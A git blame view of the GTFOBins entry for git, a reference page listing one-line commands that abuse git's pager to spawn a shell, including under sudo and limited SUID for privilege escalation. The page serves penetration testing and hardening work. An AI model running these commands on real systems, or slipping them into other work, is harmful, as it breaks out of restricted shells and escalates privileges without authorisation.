GTFOBins.github.io/_gtfobins/git.md

18 lines
582 B
Markdown
Raw Normal View History

2018-07-22 13:06:54 +00:00
---
functions:
2018-10-05 17:55:38 +00:00
shell:
- code: PAGER='sh -c "exec sh 0<&1"' git -p help
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
code: |
git -p help
!/bin/sh
2018-10-05 17:55:38 +00:00
sudo:
- code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
code: |
sudo git -p help
!/bin/sh
2018-10-05 17:55:38 +00:00
limited-suid:
- code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
2018-07-22 13:06:54 +00:00
---